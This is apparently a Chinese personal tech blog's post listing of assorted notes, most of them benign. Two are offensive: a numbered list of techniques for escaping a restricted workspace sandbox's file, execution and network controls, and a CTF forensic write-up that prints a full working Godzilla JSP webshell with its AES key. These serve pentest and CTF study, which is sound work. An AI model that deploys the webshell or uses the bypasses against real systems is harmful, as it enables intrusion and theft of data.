Posts

BIOS设置快捷键

2025年11月27日

制造商启动键宏碁 F2 Apple 按住 Option（在 ⌘ 键旁边）华硕 Del 戴尔 F12 捷威 F1 惠普 F9 Intel F2 联想 F12 Microsoft Surface 从 USB 启动 - 按住音量调低按钮启动到 UEFI 菜单 - 按住音量调高按钮东芝 F2 或 F12 其他尝试按 Esc、F1 - F12 中的任意键或 Enter

以**rust为例，设置工作空间权限功能权限剪切板拷入完全禁止剪切板拷出完全禁止文件导入完全禁止文件导出完全禁止文件发送完全禁止打印完全禁止截屏完全禁止水印已开启 Bypass-1 沙箱访问外部文件打开浏览器，访问 1file:///c:/ 2file:///C:/Windows/System32/ 通过此方式下载C:\Windows\System32\cmd.exe Bypass-2 沙箱访问外部文件 1python -m http.server 80 访问http://127.0.0.1 Bypass-3 沙箱内运行exe 文件名cmd.exe 、 control.exe可在沙箱内双击启动，这里建议生成多个exe文件，文件名FUZZ一下，模糊测试获得白名单文件名。 Bypass-4 沙箱内运行exe 一旦运行成功cmd.exe，在终端中，通常可以运行其他程序，有时候可能需要使用完整路径 999.exe M:\Users\Pro\Documents\999.exe Bypass-5 主机访问沙箱内既然沙箱内可以运行程序，通过网络127.0.0.1即可与主机完成交互例如可以在沙箱内运行https://github.com/guyupro/G25WebDAV 在主机使用WinSCP等工具连接使用即可。 http://127.0.0.1 pro pro 同理，也可以使用其他协议，例如tftp、ftp、ssh等。

注册信息安全专业人员渗透测试专家（CISP-PTS）

2025年7月11日

一、CISP-PTS 是什么注册信息安全专业人员渗透测试专家（CISP-PTS，Certified Information Security Professional - Penetration Testing Specialist）是 CISP 攻防领域中的渗透测试方向资质之一，面向具备较强实战能力、希望系统化证明技术水平的从业者。根据中国信息安全测评中心发布的白皮书，CISP-PTE/CISP-PTS 方向强调在真实网络环境中的发现问题、分析问题与解决问题能力，其中 CISP-PTS 侧重更高阶的实操能力考察。二、官方依据（建议先看）白皮书页面：注册信息安全专业人员-渗透测试方向（PTE、PTS）白皮书 2022版白皮书（PDF）：注册信息安全专业人员-渗透测试方向（PTE、PTS）白皮书（2022版）申请书下载与授权机构入口：中国信息安全测评中心-申请书下载三、报考要点（按白皮书梳理）报名前需参加授权培训机构培训根据白皮书，报考前需要完成 CISP 攻防领域授权培训机构组织的相关学习。无学历与工作经验硬性门槛白皮书明确该方向对学历和工作经验不设硬性报考要求，但对实操能力要求较高。证书有效期为 3 年证书有效期届满后，需要按规定参加维持考试并完成续证流程。四、资料准备（报名阶段）按白皮书常见要求，通常包括：《注册信息安全专业人员（攻防领域）考试及注册申请表》近期免冠 2 寸彩色蓝底证件照 3 张身份证复印件 1 份说明：资料细则可能按年度微调，最终以授权机构当期通知为准。五、培训与考试体验（个人视角）培训整体可理解为“理论 + 实操演练”双线推进。建议优先把 Web 安全、系统安全、数据库安全和中间件安全这几块建立一套自己的方法论，再通过靶场和题目反复打磨。考试我个人感受是：时间管理比单点技术更重要；信息收集、路径判断、结果复核这三步会直接影响最终得分；保持稳定输出比“拼运气拿高危点”更关键。考试时长、题型结构、评分规则等，可能随批次优化，建议以当期官方考试说明为准。六、备考建议先把基础能力做厚，再冲高阶技巧。每周固定做一次完整流程演练（信息收集 -> 漏洞验证 -> 利用与修复建议）。形成自己的“错题与复盘库”，重点记录思路偏差而不是只记答案。关注官方白皮书与授权机构通知更新，避免用旧规则备考。

打靶日记

2025年2月11日

来自https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8 NetSecFocus Trophy Room Hackthebox 🟡Linux Boxes NAME STATUS BoardLight ✅ Broker ✅ Builder ✅ Busqueda ✅ CozyHosting ✅ Editorial ✅ Help ✅ Intentions ✅ Keeper ✅ LinkVortex ✅ Magic ✅ Monitored ✅ Networked ✅ Pandora ✅ Sau ✅ Soccer ✅ UpDown ✅ Usage ✅ 🔵Windows Boxes NAME STATUS Access ✅ Administrator ✅ Aero ✅ Certified ✅ Intelligence ✅ Jeeves ✅ Mailing ✅ Manager ✅ Servmon ✅ StreamIO ✅ Support ✅ 🟢Windows Active Directory Boxes NAME STATUS Active ✅ Adagio (HTB Enterprise Box) ⏳ Blackfield ✅ Cascade ✅ Cicada ✅ Escape ✅ Flight ✅ Forest ✅ Monteverde ✅ Return ✅ Sauna ✅ Timelapse ✅ 🔴Post OSCP Section. Challenging yourself 🧿ProLabs Proving Grounds Practice 🟡Linux Boxes NAME STATUS Astronaut ✅ BitForge ⏳ Blackgate ⏳ Boolean ⏳ Clue ⏳ Cockpit ⏳ Codo ✅ Crane ⏳ Exfiltrated ✅ Extplorer ⏳ Fired ⏳ Flu ⏳ Hub ⏳ Image ⏳ Jordak ⏳ Lavita ⏳ law ⏳ Levram ⏳ Ochima ⏳ PC ⏳ Pelican ⏳ Plum ⏳ Press ⏳ PyLoader ⏳ RubyDome ✅ Scrutiny ⏳ SPX ⏳ Twiggy ⏳ Vmdak ⏳ Zipper ⏳ 🔵Windows Boxes NAME STATUS Algernon ✅ Authby ⏳ Craft ⏳ DVR4 ⏳ Helpdesk ⏳ Hepet ⏳ Hutch ⏳ Internal ⏳ Jacko ⏳ Kevin ✅ MedJed ⏳ Nickel ⏳ Resourced ⏳ Shenzi ⏳ Slort ⏳ Squid ✅ 🟢Windows Active Directory Boxes 🔴Post OSCP Section. Challenging yourself Proving Grounds Play 🟡Linux Boxes 🔴Post OSCP Section. Challenging yourself Vulnlab 🟡Linux Boxes 🔵Windows Boxes 🟢Windows Active Directory Boxes 🔴Post OSCP Section. Challenging yourself Other Labs NAME STATUS GOAD ⏳ VulnAD ⏳ Ludus ⏳ Tj Null Active Directory box ⏳

hash在线破解

2025年1月1日

https://cmd5.com/ https://crackstation.net/ Supports: LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)), QubesV3.1BackupDefaults https://hashes.com/ Supports: MD5, SHA-1, Vbulletin, Invision Power Board, MyBB, Bcrypt, Wordpress, SHA-256, SHA-512, MYSQL5

ntlm Python

2024年12月27日

1pip install pycryptodome 1from Crypto.Hash import MD4 2 3def ntlm_hash(password): 4 # 将密码编码为 UTF-16LE password_utf16 = password.encode('utf-16le') 5 # 创建 MD4 哈希对象 6 hash_object = MD4.new() 7 # 更新哈希对象 8 hash_object.update(password_utf16) 9 # 获取哈希值 10 ntlm_hash = hash_object.digest() 11 # 将结果转换为十六进制字符串 12 return ntlm_hash.hex().upper() 13 14# 明文密码 15plaintext_password = "123456" 16# 计算 NTLM 哈希 17hash_result = ntlm_hash(plaintext_password) 18 19print(f"NTLM hash for '{plaintext_password}': {hash_result}")

冥王哈迪斯Intel NUC Hades Canyon (NUC8i7HNK/NUC8i7HVK)黑苹果Hackintosh

2024年10月10日

macOS Sequoia 更新2024年10月10日感谢 https://github.com/Baio1977/NUC8i7HVK-Hackintosh Audio (Fix ALL Sound - New Layout 22 for ALC700) GPU acceleration Intel Wireless / Bluetooth Native CPU power management SD card reader (Fix 3\12\2023 add CtlnaSDXC.kext + Spoof Device Properties) HDMI video and sound Thunderbolt JHL6540 Alpine Ridge Work whit HotPlug macOS Ventura 更新2022年11月2日感谢国外小伙的https://osy.gitbook.io/hac-mini-guide/

HUAWEI 鸿蒙 HiCar

2024年8月26日

HarmonyOS 4 支持机型 HUAWEI HiCar支持的手机

HLS

2024年7月11日

HLS 由 Apple 为 Apple 产品开发，但现在已广泛用于许多设备。 HTTP Live Streaming Send live and on‐demand audio and video to iPhone, iPad, Mac, Apple Watch, Apple TV, and PC with HTTP Live Streaming (HLS) technology from Apple. Using the same protocol that powers the web, HLS lets you deploy content using ordinary web servers and content delivery networks. HLS is designed for reliability and dynamically adapts to network conditions by optimizing playback for the available speed of wired and wireless connections.

SSLyze

2024年7月9日

SSLyze is a fast and powerful SSL/TLS scanning tool and Python library. SSLyze can analyze the SSL/TLS configuration of a server by connecting to it, in order to ensure that it uses strong encryption settings (certificate, cipher suites, elliptic curves, etc.), and that it is not vulnerable to known TLS attacks (Heartbleed, ROBOT, OpenSSL CCS injection, etc.). Github: https://github.com/nabla-c0d3/sslyze # 安装 $ python -m pip install sslyze # 使用 $ python -m sslyze www.baidu.com > sslyze.exe www.baidu.com CHECKING CONNECTIVITY TO SERVER(S) ---------------------------------- www.baidu.com:443 => 220.181.38.149 SCAN RESULTS FOR WWW.BAIDU.COM:443 - 220.181.38.149 --------------------------------------------------- * Certificates Information: Hostname sent for SNI: www.baidu.com Number of certificates detected: 1 Certificate #0 ( RSAPublicKey ) SHA1 Fingerprint: 9742d59827d62288cf59c3ff75868dd5d312a0af Common Name: baidu.com Issuer: GlobalSign RSA OV SSL CA 2018 Serial Number: 26585094245224241434632730821 Not Before: 2023-07-06 Not After: 2024-08-06 Public Key Algorithm: RSAPublicKey Signature Algorithm: sha256 Key Size: 2048 Exponent: 65537 SubjAltName - DNS Names: ['baidu.com', 'baifubao.com', 'www.baidu.cn', 'www.baidu.com.cn', 'mct.y.nuomi.com', 'apollo.auto', 'dwz.cn', '*.baidu.com', '*.baifubao.com', '*.baidustatic.com', '*.bdstatic.com', '*.bdimg.com', '*.hao123.com', '*.nuomi.com', '*.chuanke.com', '*.trustgo.com', '*.bce.baidu.com', '*.eyun.baidu.com', '*.map.baidu.com', '*.mbd.baidu.com', '*.fanyi.baidu.com', '*.baidubce.com', '*.mipcdn.com', '*.news.baidu.com', '*.baidupcs.com', '*.aipage.com', '*.aipage.cn', '*.bcehost.com', '*.safe.baidu.com', '*.im.baidu.com', '*.baiducontent.com', '*.dlnel.com', '*.dlnel.org', '*.dueros.baidu.com', '*.su.baidu.com', '*.91.com', '*.hao123.baidu.com', '*.apollo.auto', '*.xueshu.baidu.com', '*.bj.baidubce.com', '*.gz.baidubce.com', '*.smartapps.cn', '*.bdtjrcv.com', '*.hao222.com', '*.haokan.com', '*.pae.baidu.com', '*.vd.bdstatic.com', '*.cloud.baidu.com', 'click.hm.baidu.com', 'log.hm.baidu.com', 'cm.pos.baidu.com', 'wn.pos.baidu.com', 'update.pan.baidu.com'] Certificate #0 - Trust Android CA Store (14.0.0_r9): OK - Certificate is trusted Apple CA Store (iOS 17, iPadOS 17, macOS 14, tvOS 17, and watchOS 10):OK - Certificate is trusted Java CA Store (jdk-13.0.2): OK - Certificate is trusted Mozilla CA Store (2024-02-04): OK - Certificate is trusted Windows CA Store (2023-12-11): OK - Certificate is trusted Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate Received Chain: baidu.com --> GlobalSign RSA OV SSL CA 2018 --> GlobalSign Verified Chain: baidu.com --> GlobalSign RSA OV SSL CA 2018 --> GlobalSign Received Chain Contains Anchor: OK - Anchor certificate not sent Received Chain Order: OK - Order is valid Verified Chain contains SHA1: OK - No SHA1-signed certificate in the verified certificate chain Certificate #0 - Extensions OCSP Must-Staple: NOT SUPPORTED - Extension not found Certificate Transparency: OK - 3 SCTs included Certificate #0 - OCSP Stapling NOT SUPPORTED - Server did not send back an OCSP response * SSL 2.0 Cipher Suites: Attempted to connect using 7 cipher suites; the server rejected all cipher suites. * SSL 3.0 Cipher Suites: Attempted to connect using 80 cipher suites. The server accepted the following 1 cipher suites: TLS_RSA_WITH_RC4_128_SHA 128 The group of cipher suites supported by the server has the following properties: Forward Secrecy INSECURE - Not Supported Legacy RC4 Algorithm INSECURE - Supported * TLS 1.0 Cipher Suites: Attempted to connect using 80 cipher suites. The server accepted the following 6 cipher suites: TLS_RSA_WITH_RC4_128_SHA 128 TLS_RSA_WITH_AES_256_CBC_SHA 256 TLS_RSA_WITH_AES_128_CBC_SHA 128 TLS_ECDHE_RSA_WITH_RC4_128_SHA 128 ECDH: prime256v1 (256 bits) TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 ECDH: prime256v1 (256 bits) TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 ECDH: prime256v1 (256 bits) The group of cipher suites supported by the server has the following properties: Forward Secrecy OK - Supported Legacy RC4 Algorithm INSECURE - Supported * TLS 1.1 Cipher Suites: Attempted to connect using 80 cipher suites. The server accepted the following 6 cipher suites: TLS_RSA_WITH_RC4_128_SHA 128 TLS_RSA_WITH_AES_256_CBC_SHA 256 TLS_RSA_WITH_AES_128_CBC_SHA 128 TLS_ECDHE_RSA_WITH_RC4_128_SHA 128 ECDH: prime256v1 (256 bits) TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 ECDH: prime256v1 (256 bits) TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 ECDH: prime256v1 (256 bits) The group of cipher suites supported by the server has the following properties: Forward Secrecy OK - Supported Legacy RC4 Algorithm INSECURE - Supported * TLS 1.2 Cipher Suites: Attempted to connect using 156 cipher suites. The server accepted the following 7 cipher suites: TLS_RSA_WITH_RC4_128_SHA 128 TLS_RSA_WITH_AES_256_CBC_SHA 256 TLS_RSA_WITH_AES_128_CBC_SHA 128 TLS_ECDHE_RSA_WITH_RC4_128_SHA 128 ECDH: prime256v1 (256 bits) TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 ECDH: prime256v1 (256 bits) TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 ECDH: prime256v1 (256 bits) TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 ECDH: prime256v1 (256 bits) The group of cipher suites supported by the server has the following properties: Forward Secrecy OK - Supported Legacy RC4 Algorithm INSECURE - Supported * TLS 1.3 Cipher Suites: Attempted to connect using 5 cipher suites; the server rejected all cipher suites. * Deflate Compression: OK - Compression disabled * OpenSSL CCS Injection: OK - Not vulnerable to OpenSSL CCS injection * OpenSSL Heartbleed: OK - Not vulnerable to Heartbleed * ROBOT Attack: OK - Not vulnerable. * Session Renegotiation: Client Renegotiation DoS Attack: OK - Not vulnerable Secure Renegotiation: OK - Supported * Elliptic Curve Key Exchange: Supported curves: prime256v1 Rejected curves: X25519, X448, prime192v1, secp160k1, secp160r1, secp160r2, secp192k1, secp224k1, secp224r1, secp256k1, secp384r1, secp521r1, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1 SCANS COMPLETED IN 33.189360 S ------------------------------ COMPLIANCE AGAINST MOZILLA TLS CONFIGURATION -------------------------------------------- Checking results against Mozilla's "MozillaTlsConfigurationEnum.INTERMEDIATE" configuration. See https://ssl-config.mozilla.org/ for more details. www.baidu.com:443: FAILED - Not compliant. * maximum_certificate_lifespan: Certificate life span is 396 days, should be less than 366. * tls_versions: TLS versions {'TLSv1.1', 'TLSv1', 'SSLv3'} are supported, but should be rejected. * ciphers: Cipher suites {'TLS_RSA_WITH_AES_128_CBC_SHA', 'TLS_RSA_WITH_AES_256_CBC_SHA', 'TLS_ECDHE_RSA_WITH_RC4_128_SHA', 'TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA', 'TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA', 'TLS_RSA_WITH_RC4_128_SHA'} are supported, but should be rejected. $ python -m sslyze 1.1.1.1:443

Kali Linux rustdesk

2024年1月1日

使用rustdesk远程控制Kali Linux 1sudo apt-get -y install gstreamer1.0-pipewire https://github.com/rustdesk/rustdesk/releases下载安装即可

iconv改文件编码

2023年12月25日

将GBK编码格式的文件，另存为UTF-8编码的文件。 1iconv -f GBK -t UTF-8 input.csv > output.csv

Markdown中文优化

2023年10月31日

最近打算对内部文档进行整理，为提升阅读体验，预计优化分以下几点：图X ，表X居中添加<center></center>实现段落添加　实现首行缩进汉字开头英文字体开头 “或者"开头连续多个空行替换

PVE Guest Agent未运行

2023年9月12日

参考：https://pve.proxmox.com/wiki/Qemu-guest-agent Linux Debian/Ubuntu 1apt-get install qemu-guest-agent Redhat 1yum install qemu-guest-agent Windows 下载https://pve.proxmox.com/wiki/Windows_VirtIO_Drivers 安装即可。

Python转换png到webp

2023年9月5日

直接上代码 1#!/usr/bin/python 2from pathlib import Path 3from PIL import Image 4 5def convert_to_webp(source): 6 destination = source.with_suffix(".webp") 7 image = Image.open(source) 8 image.save(destination, format="webp") 9 return destination 10 11def main(): 12 paths = Path(".").glob("**/*.png") 13 for path in paths: 14 webp_path = convert_to_webp(path) 15 print(webp_path) 16 17main()

陇剑杯2023 writeup

2023年8月28日

HW HW.zip 解压得到hard_web.pcap文件。 hard_web_1 题目内容：服务器开放了哪些端口，请按照端口大小顺序提交答案，并以英文逗号隔开(如服务器开放了80 81 82 83端口，则答案为80,81,82,83) 1http and http.response.code==200 题目所指的服务器应该是192.168.162.188 1tcp.connection.synack and ip.dst==192.168.162.188 发现80端口请求较多 1tcp.connection.synack and ip.dst==192.168.162.188 and tcp.port not in {80} 所以服务器开放端口应该是80 888 8888 答案 80,888,8888 hard_web_2 题目内容：服务器中根目录下的flag值是多少？哥斯拉webshell 1<%! String xc="748007e861908c03"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}%> 跟踪到流20052